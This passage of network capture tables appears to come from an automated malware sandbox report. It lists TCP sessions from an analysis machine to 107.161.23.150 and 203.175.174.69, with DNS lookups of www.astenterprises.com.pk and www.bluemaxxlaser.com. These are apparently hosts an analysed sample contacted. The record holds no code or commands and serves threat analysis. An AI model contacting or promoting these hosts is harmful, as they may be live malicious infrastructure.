                                                                                        Dec 19, 2024 12:48:00.770678043 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.770678043 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.819361925 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.819396019 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.819452047 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.819473028 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.821677923 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.821677923 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.943891048 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.943912983 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.943970919 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.943981886 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.944020033 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.971517086 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.971538067 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.971601009 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.971611023 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.971646070 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.994800091 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.994817972 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.994863987 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:00.994869947 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:00.994911909 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.023852110 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.023871899 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.023932934 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.023945093 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.023983955 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.131134033 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.131160021 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.131198883 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.131222010 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.131239891 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.131258011 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.151055098 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.151072979 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.151115894 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.151137114 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.151154995 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.151173115 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.167120934 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.167196035 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.167208910 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.167222977 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.167248964 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.167273045 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.185091972 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.185158968 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.185162067 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.185194016 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.185213089 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.185229063 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.202980995 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.203032970 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.203054905 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.203068972 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.203094959 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.203111887 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.218704939 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.218759060 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.218791962 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.218826056 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.218842983 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.218864918 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.309046030 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.309073925 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.309151888 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.309186935 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.309222937 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.321722031 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.321748972 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.321799994 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.321815968 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.321855068 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.334902048 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.334927082 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.334981918 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.334995985 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.335030079 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.335048914 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.345900059 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.345925093 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.345973969 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.345983982 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.346024036 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.357367039 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.357402086 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.357441902 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.357454062 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.357501984 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.365098000 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.365128040 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.365161896 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.365174055 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.365211010 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.371870041 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.371897936 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.371963024 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.371975899 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.372009993 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.377990961 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.378022909 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.378078938 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.378089905 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.378130913 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.501430988 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.501506090 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.501584053 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.501637936 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.501677990 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.501811028 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.507242918 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.507293940 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.507329941 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.507354975 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.507360935 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.507417917 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.513062954 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.513118029 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.513142109 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.513154984 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.513273954 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.513273954 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.519778013 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.519856930 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.519881010 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.519900084 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.519932985 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.519954920 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.526052952 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.526099920 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.526143074 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.526156902 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.526184082 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.526204109 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.532159090 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.532207012 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.532247066 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.532262087 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.532289028 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.532310963 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.538794994 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.538861990 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.538885117 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.538908005 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.538937092 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.538958073 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.544630051 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.544682026 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.544723034 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.544742107 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.544770002 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.544872999 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.693171978 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.693197012 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.693264008 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.693279028 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.693315983 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.699255943 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.699274063 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.699328899 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.699337006 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.699369907 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.705081940 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.705099106 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.705172062 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.705180883 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.705210924 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.711694002 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.711716890 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.711772919 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.711781025 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.711790085 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.712027073 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.718122959 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.718139887 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.718219995 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.718226910 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.718270063 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.724431038 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.724447966 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.724508047 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.724514961 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.724553108 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.730870962 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.730887890 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.730952024 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.730958939 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.730995893 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.736684084 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.736707926 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.736757994 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.736766100 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.736782074 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.736804008 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.885763884 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.885791063 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.885859013 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.885890007 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.885906935 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.885926008 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.891874075 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.891892910 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.892148972 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.892184019 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.892237902 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.898519993 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.898538113 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.898621082 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.898633957 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.898673058 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.904084921 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.904119015 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.904175997 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.904185057 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.904208899 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.904222012 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.910823107 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.910867929 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.910926104 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.910948992 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.910981894 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.911489964 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.916852951 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.916899920 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.916937113 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.916953087 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.917006969 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.917006969 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.923455954 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.923505068 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.923541069 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.923556089 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.923587084 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.923607111 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.929958105 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.930002928 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.930052996 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.930067062 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:01.930113077 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:01.931493044 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.078474998 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.078572989 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.078613997 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.078643084 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.078671932 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.078691006 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.084295988 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.084353924 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.084378958 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.084391117 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.084419012 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.084438086 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.090754986 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.090801001 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.090858936 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.090871096 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.090895891 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.090914965 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.096611023 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.096656084 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.096693039 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.096704960 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.096731901 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.096749067 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.103168011 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.103216887 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.103255987 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.103267908 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.103296041 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.103333950 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.109272957 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.109316111 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.109352112 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.109364986 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.109390974 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.111489058 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.115895987 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.115956068 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.115978956 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.115992069 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.116063118 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.116063118 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.122380018 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.122422934 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.122459888 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.122472048 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.122498035 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.122536898 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.123610020 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.123699903 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.123713970 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.123766899 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.123773098 CET44349710107.161.23.150192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.123826027 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.126240969 CET49710443192.168.2.6107.161.23.150
                                                                                        Dec 19, 2024 12:48:02.511250973 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:02.631263971 CET8049721203.175.174.69192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.631356955 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:02.635452986 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:02.755278111 CET8049721203.175.174.69192.168.2.6
                                                                                        Dec 19, 2024 12:48:04.165550947 CET8049721203.175.174.69192.168.2.6
                                                                                        Dec 19, 2024 12:48:04.210982084 CET4972180192.168.2.6203.175.174.69
                                                                                        Dec 19, 2024 12:48:05.727544069 CET4972180192.168.2.6203.175.174.69

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 19, 2024 12:47:58.689100981 CET5653953192.168.2.61.1.1.1
                                                                                        Dec 19, 2024 12:47:58.826335907 CET53565391.1.1.1192.168.2.6
                                                                                        Dec 19, 2024 12:48:02.266480923 CET5512353192.168.2.61.1.1.1
                                                                                        Dec 19, 2024 12:48:02.510039091 CET53551231.1.1.1192.168.2.6
                                                                                        Dec 19, 2024 12:48:12.930546045 CET5525253192.168.2.61.1.1.1
                                                                                        Dec 19, 2024 12:48:28.100707054 CET6433953192.168.2.61.1.1.1
                                                                                        Dec 19, 2024 12:48:52.181032896 CET5706853192.168.2.61.1.1.1

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 19, 2024 12:47:58.689100981 CET192.168.2.61.1.1.10xa593Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:02.266480923 CET192.168.2.61.1.1.10x78ccStandard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:12.930546045 CET192.168.2.61.1.1.10xcf6cStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:28.100707054 CET192.168.2.61.1.1.10xe41bStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:52.181032896 CET192.168.2.61.1.1.10xf0d2Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 19, 2024 12:47:58.826335907 CET1.1.1.1192.168.2.60xa593No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
